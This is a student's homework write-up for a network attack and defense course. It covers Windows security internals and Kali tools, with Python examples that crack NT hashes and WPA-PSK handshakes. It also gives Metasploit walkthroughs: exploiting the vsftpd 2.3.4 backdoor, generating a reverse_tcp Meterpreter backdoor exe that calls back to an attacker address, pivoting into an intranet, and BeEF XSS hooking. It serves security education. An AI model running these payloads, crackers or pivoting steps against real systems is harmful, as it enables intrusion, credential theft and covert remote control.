"Network Attack and Defense" Week 7 Homework

learning materials

Chapter VII Security Protection of Windows Operating System

  • Windows OS Framework
    • The development and current situation of the Windows operating system
      Windows holds a very high share of the desktop operating system market, and at the time of these notes Windows XP still had a large number of users in China. That matters for security because XP left extended support in April 2014, so those installations receive no further security patches.
    • Basic structure of the Windows operating system
      1. Basic modules of the Windows kernel: the Windows executive, the Windows kernel, device drivers, the hardware abstraction layer (HAL), and the kernel-mode implementation of windowing and the GUI (win32k).
      2. Code modules of Windows in user mode: system support processes, environment subsystem service processes, service processes, user applications, and the core subsystem DLLs.
      3. Core mechanisms: Windows process and thread management, memory management, file management, registry management, and the Windows network mechanism.
      The Windows network stack, mapped onto the OSI reference model from the physical layer up to the application layer, consists of the following component modules:
      ① Network card hardware device drivers, at the OSI physical layer
      ② The NDIS library and miniport drivers, at the OSI link layer
      ③ The TDI transport layer, also called network protocol drivers, at the OSI network and transport layers
      ④ Network API DLLs and TDI clients, corresponding to the OSI session and presentation layers
      ⑤ Network applications and service processes, corresponding to the OSI application layer
      (This is the XP-era stack; TDI has been deprecated since Windows Vista in favour of Winsock Kernel and the Windows Filtering Platform, which is where modern host firewalls and EDR network sensors hook in.)
  • Security Architecture and Mechanism of Windows Operating System
    • The Windows security architecture
      implements the basic object security model based on the Reference Monitor model. Its core is the SRM (Security Reference Monitor) in the kernel and the LSASS (Local Security Authority Subsystem Service) in user mode.
    • Windows authentication mechanisms
      Security principals are divided into three categories: users, user groups, and computers. Each security principal is identified by a SID (security identifier) that is unique in both time and space.
      Windows does not store user passwords in the clear. Local account password hashes are kept in the SAM database (domain accounts in Active Directory). The SAM holds the LM hash (DES-based, at most 14 characters, disabled by default since Windows Vista) and the NT hash (the 128-bit MD4 digest of the UTF-16LE encoded password); the SAM itself is additionally encrypted with the system key (SYSKEY/boot key). Neither hash is salted, so identical passwords produce identical hashes, which is what makes dictionary and rainbow-table attacks on extracted hashes practical.
      The Winlogon process, the GINA graphical logon window (replaced by credential providers since Windows Vista), and the LSASS service cooperate to complete the local authentication process.
    • Windows authorization and access control mechanism
      Windows authorization and access control is based on the reference monitor model and is implemented by the SRM module in the kernel together with the LSASS service in user mode.
      Windows abstracts every resource that needs protection into an object, and each object carries an SD (Security Descriptor) consisting of the following attributes: the Owner SID, the Group SID, the DACL (Discretionary Access Control List, which grants or denies access rights), and the SACL (System Access Control List, which defines what is audited). When a process opens an object, the SRM compares the SIDs in the process's access token against the DACL's ACEs in order: a deny ACE that matches a requested right refuses access, and allow ACEs accumulate rights until the request is satisfied. An object with no DACL at all (a NULL DACL) is accessible to everyone, which is not the same as an empty DACL, which grants nothing.
    • Windows security audit mechanism
      The system audit policy is defined by the administrator in the local security policy and determines which events the system records (logon events, object access, privilege use, policy changes, and so on). The records go to the Security event log, which is the primary evidence for incident response; that is exactly why attackers turn audit off and clear the event log, as described in the local attack section below.
    • Other Windows Security Mechanisms
      Windows Security Center integrates the three most critical security measures for protecting a Windows system: the firewall, automatic patch updates, and virus protection. Beyond Security Center, Windows security features include the IPSec encryption and authentication mechanism, the EFS encrypted file system, the Windows file protection mechanism, and the privacy and browsing protection mechanisms of the bundled IE browser.
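As an added worked example (not part of the course notes and not Microsoft's code), the following Python parses a security descriptor written in SDDL string form into the four attributes listed above (owner, group, DACL, SACL) and then runs a simplified version of the SRM's ordered DACL walk. The alias tables are a constructed subset of the real SDDL alias set, the sample SDDL string and token SIDs are constructed, and the check deliberately omits the owner's implicit rights, generic-right mapping and MAXIMUM_ALLOWED. On a real system the SDDL of a file is obtained in PowerShell with (Get-Acl <path>).Sddl.

```python
import re

# Constructed lookup tables for this example: a subset of the SDDL alias set.
SID_ALIASES = {
    "BA": "S-1-5-32-544",   # BUILTIN\Administrators
    "BU": "S-1-5-32-545",   # BUILTIN\Users
    "SY": "S-1-5-18",       # NT AUTHORITY\SYSTEM
    "AU": "S-1-5-11",       # Authenticated Users
    "WD": "S-1-1-0",        # Everyone
}
RIGHT_ALIASES = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
}
FILE_READ_DATA, FILE_WRITE_DATA = 0x1, 0x2


def _pairs(text):
    """ACE flags and rights aliases are two-letter tokens run together."""
    return tuple(text[i:i + 2] for i in range(0, len(text), 2))


def _parse_rights(text):
    """Rights field: a hex mask or a run of two-letter aliases such as 'FRFW'."""
    if text.lower().startswith("0x"):
        return int(text, 16)
    mask = 0
    for alias in _pairs(text):
        mask |= RIGHT_ALIASES[alias]
    return mask


def _parse_acl(text):
    """'PAI(A;;FA;;;BA)(...)' -> ACL control flags plus the ordered ACE list."""
    aces = []
    for body in re.findall(r"\(([^)]*)\)", text):
        ace_type, ace_flags, rights, _obj, _inh_obj, sid = body.split(";")[:6]
        aces.append({"type": ace_type, "flags": _pairs(ace_flags),
                     "rights": _parse_rights(rights),
                     "sid": SID_ALIASES.get(sid, sid)})
    control = tuple(re.findall(r"AI|AR|P", text.split("(", 1)[0]))
    return {"flags": control, "aces": aces}


def parse_sddl(sddl):
    """Split an SDDL string into the four SD attributes: owner, group, DACL, SACL."""
    sections, key, buf, depth, i = {}, None, [], 0, 0
    while i < len(sddl):
        ch = sddl[i]
        if depth == 0 and ch in "OGDS" and sddl[i + 1:i + 2] == ":":
            if key is not None:
                sections[key] = "".join(buf)
            key, buf, i = ch, [], i + 2
            continue
        depth += (ch == "(") - (ch == ")")
        buf.append(ch)
        i += 1
    if key is not None:
        sections[key] = "".join(buf)
    sd = {}
    if "O" in sections:
        sd["owner"] = SID_ALIASES.get(sections["O"], sections["O"])
    if "G" in sections:
        sd["group"] = SID_ALIASES.get(sections["G"], sections["G"])
    if "D" in sections:
        sd["dacl"] = _parse_acl(sections["D"])
    if "S" in sections:
        sd["sacl"] = _parse_acl(sections["S"])
    return sd


def access_check(sd, token_sids, desired):
    """Simplified SRM DACL walk: ACEs are evaluated in order; a deny ACE that covers
    any still-wanted right fails the request, allow ACEs strip rights until none
    remain. Owner implicit rights, generic mapping and MAXIMUM_ALLOWED are omitted."""
    if "dacl" not in sd:
        return True                       # NULL DACL: no protection at all
    remaining = desired
    for ace in sd["dacl"]["aces"]:
        if "IO" in ace["flags"] or ace["sid"] not in token_sids:
            continue                      # inherit-only ACEs do not protect this object
        if ace["type"] == "D" and remaining & ace["rights"]:
            return False
        if ace["type"] == "A":
            remaining &= ~ace["rights"]
            if remaining == 0:
                return True
    return remaining == 0                 # empty DACL: nobody gets anything


# Constructed example: Users may read but are explicitly denied FILE_WRITE_DATA,
# Administrators get full access, and successful access by Everyone is audited.
SAMPLE_SDDL = "O:BAG:SYD:PAI(D;;0x2;;;BU)(A;;FA;;;BA)(A;;FR;;;BU)S:(AU;SA;FA;;;WD)"
USERS_TOKEN = {"S-1-5-32-545", "S-1-5-11"}

if __name__ == "__main__":
    sd = parse_sddl(SAMPLE_SDDL)
    print("read  as Users:", access_check(sd, USERS_TOKEN, FILE_READ_DATA))
    print("write as Users:", access_check(sd, USERS_TOKEN, FILE_WRITE_DATA))
    print("FA    as Admin:", access_check(sd, {"S-1-5-32-544"}, RIGHT_ALIASES["FA"]))
```

Two things the walk makes visible that the textbook summary does not: a deny ACE for FW also blocks an FR request, because FR and FW share the READ_CONTROL and SYNCHRONIZE bits, and a descriptor with no D: component at all grants everything to everyone, which is the misconfiguration to look for when auditing service binaries and named pipes.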
  • Windows remote security attack and defense technology
    Windows remote attack technology can be divided into: remote password guessing and cracking attacks, attacking Windows network services, attacking Windows clients and users
    • Windows System Security Vulnerability Life Cycle
      Windows Security Vulnerability Discovery, Exploitation and Patching Process
      Public vulnerability disclosure databases: several well-known general vulnerability databases are CVE, NVD, SecurityFocus (BugTraq), OSVDB (discontinued in 2016), etc.
      Penetration testing attack process for a specific target: ① scan the target for vulnerabilities ② find exploit code for the discovered vulnerabilities ③ carry out the penetration test
      Using Metasploit to carry out penetration testing
      Metasploit is a completely open source penetration testing software. It adopts an extensible model of a development framework plus modular components: the Metasploit Framework (MSF) library, written in Ruby, is the core of the whole software and provides the platform for developing and testing penetration components; the modular components are the code that actually implements the attacks.
      Metasploit provides four different user interfaces: msfcli (command line), msfconsole, a web interface, and a GUI, of which the console is by far the most commonly used. (msfcli was removed in 2015; msfconsole -x "..." now covers its non-interactive use case.)
    • Windows remote password guessing and cracking attacks
    • Windows network service remote penetration attack
      By default Windows opens ports 135/TCP, 137/UDP, 139/TCP and 445/TCP, corresponding to the MSRPC (Microsoft Remote Procedure Call) endpoint mapper, the NetBIOS name service, the NetBIOS session service, and SMB file and printer sharing directly over TCP (SMB also runs over NetBIOS on 139). These are the services that remote Windows exploits have historically targeted, so the first defensive check is whether they are reachable from untrusted networks at all.
      Well-known vulnerabilities and attacks on NetBIOS network services
      Well-known vulnerabilities and attacks on SMB network services
      Well-known vulnerabilities and attacks on MSRPC network services
      Remote penetration attacks on Microsoft network services on Windows systems
      Remote penetration attacks on third-party network services on Windows systems
      Preventive measures against remote network service penetration attacks
  • Windows local security attack and defense technology
    • Windows local privilege escalation
      The highest privilege is the Administrator or Local System (SYSTEM) account. The attack technique of attempting to obtain a privileged account starting from restricted user rights is called privilege escalation.
    • Windows sensitive information stealing
      Windows system password ciphertext (hash) extraction technology
      Windows system password cracking technology
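An added example, not from the course notes or any of the tools they mention, showing what the extraction and cracking steps actually operate on: the pwdump-style user:rid:lmhash:nthash::: lines that hash extraction tools output, the NT hash definition from the authentication section (MD4 over the UTF-16LE password, no salt), and a dictionary attack against a dump. MD4 is implemented inline because OpenSSL 3 frequently disables it as a legacy digest, so hashlib.new("md4") cannot be relied on. The sample dump and wordlist are constructed; the Administrator line uses the published NT hash test vector for the password "password", the other hashes are computed here.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "": LM storage is disabled


def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & MASK


def _md4_compress(state, block):
    """One 64-byte MD4 block (RFC 1320): three rounds of 16 steps over a, b, c, d."""
    X = struct.unpack("<16I", block)
    a, b, c, d = state
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for fn, k, order, shifts in rounds:
        for i, idx in enumerate(order):
            a = _rotl((a + fn(b, c, d) + X[idx] + k) & MASK, shifts[i % 4])
            a, b, c, d = d, a, b, c
    return [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]


def md4(data):
    """Pure-Python MD4: pad with 0x80, zeros to 56 mod 64, then the 64-bit LE bit length."""
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        state = _md4_compress(state, msg[off:off + 64])
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); unsalted, so equal passwords give equal hashes."""
    data = password.encode("utf-16le")
    try:
        return hashlib.new("md4", data).hexdigest()
    except ValueError:                       # legacy digest disabled in this OpenSSL build
        return md4(data).hex()


def parse_pwdump(line):
    """pwdump-style line: user:rid:lmhash:nthash::: as produced by hash extraction tools."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
            "lm_disabled": lm.lower() == EMPTY_LM}


def crack(entries, wordlist):
    """Dictionary attack: hash every candidate once, then look each account up in the table.
    With no salt the cost is one MD4 per candidate for all accounts together."""
    table = {}
    for word in wordlist:
        table.setdefault(nt_hash(word), word)
    return {e["user"]: table[e["nt"]] for e in entries if e["nt"] in table}


# Constructed sample dump. Administrator's NT hash is the public test vector for "password";
# the other two are computed here for the demonstration.
SAMPLE_DUMP = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    "bob:1001:aad3b435b51404eeaad3b435b51404ee:" + nt_hash("letmein") + ":::",
    "svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:" + nt_hash("Tr0ub4dor&3") + ":::",
]
WORDLIST = ["123456", "password", "letmein", "qwerty"]

if __name__ == "__main__":
    entries = [parse_pwdump(line) for line in SAMPLE_DUMP]
    print(crack(entries, WORDLIST))      # svc_backup is not in the wordlist and stays uncracked
```

The lm_disabled flag is the first thing to check in a dump: the fixed value aad3b435b51404eeaad3b435b51404ee means no LM hash is stored, so only the NT hash can be attacked. The LM algorithm itself (DES over two 7-character halves of the upper-cased password) is left out of this block.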
    • Turn off the audit function in Windows and clear the event log
      Preventive measures against trace removal
    • Windows Remote Control and Backdoor Program
      Command Line Remote Control Tool
      Graphical Remote Control Tool
      Preventive Measures Against Backdoor Programs

video learning

Kali Wireless Security Analysis Tool

RFID/NFC tools

Related to this is the attack and cracking of IC cards: meal cards, room cards and water cards can all be targets for attack testing.

Software Defined Radio

Reference website: http://geekcar.net/archives/7748
Bluetooth Toolset

Wireless Network Analysis Tool

The BackTrack family (Kali's predecessor) is known for this and includes tools such as the Aircrack-ng wireless network analysis suite.

1. Aircrack-ng
Aircrack-ng is a suite of security tools for analysing 802.11 wireless networks. Its main functions are network detection, packet sniffing, and WEP and WPA/WPA2 cracking. WEP is broken outright; WPA/WPA2-PSK "cracking" is a dictionary attack against a captured 4-way handshake, so its success depends entirely on the strength of the passphrase.
Download address: http://www.aircrack-ng.org/

2. coWPAtty, a well-known tool for cracking the passphrase from a captured WPA-PSK handshake

3. eapmd5pass, a password cracking tool for EAP-MD5

4. fern-wifi-cracker, a graphical tool written in Python; under Kali it can detect the external wireless card

5. MDK3, a wireless DoS test tool that can attack in Beacon Flood, Authentication DoS and other modes, and also has a brute-force mode for discovering hidden ESSIDs, 802.1X testing, and WIDS confusion.

6. wifite, an automated wireless auditing tool written in Python that completes the cracking automatically by driving the Aircrack-ng suite and Reaver.

7. Reaver cracks the WPS PIN of routers that have WPS enabled, and many consumer routers ship with it enabled. The WPS PIN is 8 digits, but the last digit is a checksum and the protocol validates the two halves separately, so at most about 11,000 attempts are needed rather than 10^8; once the PIN is recovered the router hands over the WPA passphrase.
For PIN cracking, refer to: http://blog.csdn.net/tinyeyeser/article/details/17127805
BSSID is the MAC address of the access point.
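As an added example (not part of the course notes and not code from Aircrack-ng or coWPAtty), this Python shows the computation those WPA-PSK crackers repeat for every candidate passphrase: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), the pairwise key expansion from the two MAC addresses and two nonces of the 4-way handshake, and the MIC over EAPOL message 2 that lets a candidate be confirmed or rejected. The MACs, nonces and the stand-in EAPOL frame are constructed; the captured MIC is computed here from the "true" passphrase, and the PMK test uses the passphrase/SSID vector published in the 802.11i standard.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """WPA-PSK: the pairwise master key is derived only from passphrase and SSID,
    which is why precomputed tables (coWPAtty's genpmk) are per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """802.11i PRF-512: concatenated HMAC-SHA1 blocks with a counter byte, cut to 64 bytes."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """Pairwise transient key; min/max ordering makes it independent of who is who."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2/CCMP MIC: HMAC-SHA1 with the 16-byte KCK, truncated to 16 bytes
    (WPA/TKIP uses HMAC-MD5 instead)."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(capture, wordlist):
    """Return the first wordlist entry whose derived KCK reproduces the captured MIC."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = derive_ptk(pmk, capture["ap_mac"], capture["sta_mac"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None


# Constructed handshake material (not a real capture). The EAPOL bytes stand in for
# message 2 of the 4-way handshake with its MIC field zeroed.
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_M2_ZEROED = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 8 + SNONCE + b"\x00" * 56

_TRUE_PMK = pmk_from_passphrase("password", "IEEE")        # the network's real passphrase
CAPTURE = {
    "ssid": "IEEE", "ap_mac": AP_MAC, "sta_mac": STA_MAC,
    "anonce": ANONCE, "snonce": SNONCE, "eapol": EAPOL_M2_ZEROED,
    "mic": eapol_mic(derive_ptk(_TRUE_PMK, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16], EAPOL_M2_ZEROED),
}

if __name__ == "__main__":
    print(crack_handshake(CAPTURE, ["123456", "password", "letmein"]))
```

The 4096 PBKDF2 iterations are the whole cost of the attack: one SHA1-based derivation per candidate per SSID, which is why the tools on this page are slow on CPUs, why GPU crackers and precomputed PMK tables exist, and why a long random passphrase defeats them regardless of tooling.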

Kali vulnerability exploitation: retrieval

1. searchsploit searches the local Exploit-DB copy by keyword and returns the matching vulnerability entries together with the path of the corresponding exploit code, for example:
searchsploit wordpress

The output lists the vulnerabilities and the file paths. A listed file can be viewed in place with searchsploit -x <path>, or copied into the current directory with searchsploit -m <path>.

2. iKAT automatically serves a range of exploits and waits for the target to visit.

3. termineter aims to assess the security of smart meters

Kali vulnerability exploitation: Metasploit basics

Metasploit is widely used in penetration testing. The software bundles many tools that together form a complete attack framework.

1. Start the services. To use Metasploit in Kali, first start the PostgreSQL database service and the Metasploit service; the msf database can then be used to search exploits and keep records.
2. Paths. In Kali, msf is installed under /usr/share/metasploit-framework.
3. Basic commands.
   msfpayload: generates a payload or shellcode. Searches can be used to query; the options summary switch (O in the old msfpayload syntax) lists the parameters a payload requires.
   msfencode: the encoder in msf. Originally used to bypass AV (antivirus software), it later served mainly to encode msfpayload output so that the bad characters of an exploit are avoided.
   msfconsole: opens the Metasploit console. Type msfconsole to open msf.
   (msfpayload and msfencode were removed from the framework in 2015; their functions are combined in msfvenom, which takes the payload with -p, the encoder with -e and the output format with -f.)

For example, to list the Windows payloads:
msfpayload -l | grep windows

4. Test example: find vulnerabilities and search for an exploit
nmap -sV 222.28.136.171

The scan shows the ftp service open on port 21, running vsftpd 2.3.4. Is there a known vulnerability in this version? Search in msf for a match:
search vsftpd

5. Test example: select the exploit and view its parameters

There was a small problem when entering the exploit. After checking, I found that I had made an input error. After correcting it, I viewed the parameters correctly. I found that the RHOST parameter had not been set, and then set it:
set RHOST 222.28.136.171

6. Test example: select the payload

After setting it, show options checks the parameters again; there are no further parameters to set.

7. Attack test: execute the attack by entering exploit. If it succeeds, a shell is returned:

At this point you can run id, view the IP address, list files and so on, confirming the privileges obtained on the target host.
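The scan-then-search-then-exploit sequence above is repeated on every engagement, so as an added example (not from the notes and not Metasploit's own code) this Python parses normal nmap -sV output into open services, derives the product+version string that both search in msfconsole and searchsploit want, and writes the interactive use/set/exploit steps out as an msfconsole resource script that can be replayed with msfconsole -r. The scan text is constructed with an RFC 5737 address; exploit/unix/ftp/vsftpd_234_backdoor is the real module name that search vsftpd returns. Note that current Metasploit versions name the target option RHOSTS rather than the RHOST used in the notes.

```python
import re

# Constructed nmap -sV normal output (RFC 5737 address); the page's real scan is not reproduced.
SAMPLE_SCAN = """\
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 192.0.2.10
Host is up (0.0012s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE    SERVICE     VERSION
21/tcp  open     ftp         vsftpd 2.3.4
22/tcp  open     ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp filtered microsoft-ds
"""

# port/proto  state  service  [version banner]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap_sv(text):
    """Return only the open services from nmap -sV normal output."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m and m.group(3) == "open":
            services.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "service": m.group(4),
                "version": (m.group(5) or "").strip(),
            })
    return services


def search_terms(service):
    """Product plus version is what msfconsole's search and searchsploit match best:
    'vsftpd 2.3.4' rather than the whole banner or the bare service name."""
    tokens = service["version"].split()
    return " ".join(tokens[:2]) if tokens else service["service"]


def build_rc(module, options, payload=None):
    """Emit the notes' manual use / set / exploit steps as an msfconsole resource script."""
    lines = [f"use {module}"]
    for key, value in options.items():
        lines.append(f"set {key} {value}")
    if payload:
        lines.append(f"set PAYLOAD {payload}")
    lines.append("exploit")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for svc in parse_nmap_sv(SAMPLE_SCAN):
        print(f"{svc['port']}/{svc['proto']} {svc['service']:12} search: {search_terms(svc)}")
    print(build_rc("exploit/unix/ftp/vsftpd_234_backdoor", {"RHOSTS": "192.0.2.10"}))
```

Keeping the steps in a resource script also leaves an exact record of what was run against which host, which a report (or an incident responder on the other side) will want. For XML scan output, searchsploit --nmap <file.xml> performs the same version-to-exploit lookup directly.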

Kali vulnerability exploitation: introduction to Meterpreter

Generate the Meterpreter backdoor; open MSF and start the listener (use exploit/multi/handler, select the same payload, and set the LHOST and LPORT parameters of reverse_tcp to the attacker's address and port); then execute door.exe on the target machine, which connects back to the listener.
msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe /* Check your own IP address first: here it is 222.28.136.234. LHOST and LPORT are the parameters of reverse_tcp and can be viewed in msf (remember to start the services). */

Use exploit/multi/handler to receive the returned connection.

Executing the command above generates the door.exe file.

Kali vulnerability exploitation: Metasploit post-penetration testing

Once the foothold host (the "springboard") has been obtained with certain privileges, the next step is to push into the intranet: enumerate the internal hosts, collect the target information, and probe for system vulnerabilities. The Meterpreter session msf already has makes this series of operations much easier.

1. View the network interfaces and segments (ifconfig). Three interfaces can be seen: the loopback, the one we reached the host on, and one with an internal IP that we cannot reach directly (try ping to confirm).
2. Add a route: run autoroute -s 10.0.0.1 (autoroute defaults to a /24 netmask; the subnet form 10.0.0.0/24 states the intent more clearly). Afterwards msf modules can attack or scan across network segments through the session. The route is added quickly via the autoroute script.
3. Open a SOCKS proxy with the auxiliary/server/socks4a module; a browser, sqlmap, nmap and other tools can then reach intranet computers through the proxy.
4. Switch between sessions freely with background and sessions -i <id>.
5. Type run followed by Tab to see the many scripts that can be run from the meterpreter.
6. Likewise run post/ followed by Tab lists the post-exploitation modules.
7. Obtain intranet information: run arp_scanner -r 10.0.0.1/24
8. Files can also be uploaded and ports forwarded for subsequent testing; for example upload lcx.exe c:\\ transfers the file to the root of the C: drive.
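The socks4a proxy in step 3 is what lets tools on the attacker's box reach hosts that only the pivot can route to, so as an added example (not from the notes and not Metasploit's code) this Python builds and parses the SOCKS4/SOCKS4a CONNECT exchange that a client such as proxychains sends to that module, and simulates the round trip offline. The hostnames, addresses and the "routable" set are constructed stand-ins for what the pivot can actually reach.

```python
import ipaddress
import struct

SOCKS_VERSION, CMD_CONNECT = 4, 1
REQUEST_GRANTED, REQUEST_REJECTED = 0x5A, 0x5B


def build_connect(host, port, userid=b"kali"):
    """Client side. A dotted-quad host gives a plain SOCKS4 CONNECT. A name gives
    SOCKS4a: DSTIP is set to the invalid 0.0.0.1 and the name is appended after the
    USERID, so the proxy (the pivot) resolves it instead of the attacker's resolver."""
    try:
        ip_bytes = ipaddress.IPv4Address(host).packed
        tail = b""
    except ipaddress.AddressValueError:
        ip_bytes = b"\x00\x00\x00\x01"
        tail = host.encode("idna") + b"\x00"
    return struct.pack(">BBH", SOCKS_VERSION, CMD_CONNECT, port) + ip_bytes + userid + b"\x00" + tail


def parse_connect(data):
    """Server side: what auxiliary/server/socks4a has to extract from a request."""
    if len(data) < 9:
        raise ValueError("truncated SOCKS4 request")
    vn, cmd, port = struct.unpack(">BBH", data[:4])
    if vn != SOCKS_VERSION or cmd != CMD_CONNECT:
        raise ValueError(f"unsupported request vn={vn} cmd={cmd}")
    ip = data[4:8]
    parts = data[8:].split(b"\x00", 1)
    if len(parts) != 2:
        raise ValueError("USERID not terminated")
    userid, rest = parts
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:        # SOCKS4a marker: name follows
        host = rest.split(b"\x00", 1)[0].decode("idna")
    else:
        host = str(ipaddress.IPv4Address(ip))
    return {"host": host, "port": port, "userid": userid.decode()}


def build_reply(granted, port=0, ip="0.0.0.0"):
    """Reply: VN is 0 (not 4), CD is 0x5A granted / 0x5B rejected, then DSTPORT, DSTIP."""
    code = REQUEST_GRANTED if granted else REQUEST_REJECTED
    return struct.pack(">BBH", 0, code, port) + ipaddress.IPv4Address(ip).packed


def parse_reply(data):
    if len(data) < 8:
        raise ValueError("truncated SOCKS4 reply")
    vn, cd, port, ip = struct.unpack(">BBH4s", data[:8])
    if vn != 0:
        raise ValueError(f"bad reply version {vn}")
    return {"granted": cd == REQUEST_GRANTED, "code": cd,
            "port": port, "ip": str(ipaddress.IPv4Address(ip))}


def exchange(host, port, routable):
    """One CONNECT round trip, offline. `routable` stands in for the pivot's view of
    which intranet targets its added routes can reach."""
    request = build_connect(host, port)
    parsed = parse_connect(request)
    reply = build_reply(granted=parsed["host"] in routable, port=parsed["port"])
    return parsed, parse_reply(reply)


if __name__ == "__main__":
    print(exchange("dc01.corp.local", 445, {"dc01.corp.local", "10.0.0.5"}))
    print(exchange("10.0.0.99", 22, {"dc01.corp.local", "10.0.0.5"}))
```

Two practical consequences follow from the framing: because only TCP CONNECT exists, nmap through the proxy must use a connect scan without host discovery (-sT -Pn), since SYN scans and ICMP pings never enter the SOCKS tunnel; and a proxychains entry of the form socks4 127.0.0.1 1080 should point at the port the socks4a module was started on.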

Kali vulnerability exploitation: BeEF


1. Start BeEF from the command line: beef-xss


2. Suppose that, because of an XSS vulnerability, the host under test is made to load http://127.0.0.1:3000/demos/basic.html, which embeds the BeEF hook script.

At this time, there will be an online host on the left side of the page:




Here the input is hello world, and the result below returns success!

5. Proxy function
Select the target host, right-click, and choose Use as Proxy from the menu; then edit and send the request you want in Forge Request under the Rider tab. The request is issued from the hooked browser, so it carries that browser's origin and cookies.

6. BeEF does not load Metasploit by default. To use Metasploit's rich set of attack modules, some configuration is needed.
Default:

Configuration:
First open the beef-xss directory:

cd /usr/share/beef-xss/
ls
nano config.yaml  /* Edit it: there is a lot of configuration here, and the username and password can also be set here. Change the Metasploit setting from false to true. */
clear


Make sure the IP and other details here are set correctly (127.0.0.1 does not work; use the machine's own IP), and change the custom path:

cd extensions/metasploit/
ls
nano config.yaml   /* Change the IP on the host and callback_host lines to this machine's IP, and change the custom path to /usr/share/metasploit-framework/ */

After configuring, open msfconsole and run:

load msgrpc ServerHost=222.28.136.234 Pass=abc123

ServerHost must match the host set in the BeEF metasploit config, and Pass must match its pass value; abc123 is the value BeEF ships with, so change it on anything other than a lab box. Then reload BeEF with ./beef -x so that the Metasploit exploit modules are loaded, and restart the service:

service beef-xss restart

At this time, visiting the previous pages again, I found that I could not connect. After waiting a while and logging in with the default username and password, I found that there are many more modules under Metasploit:
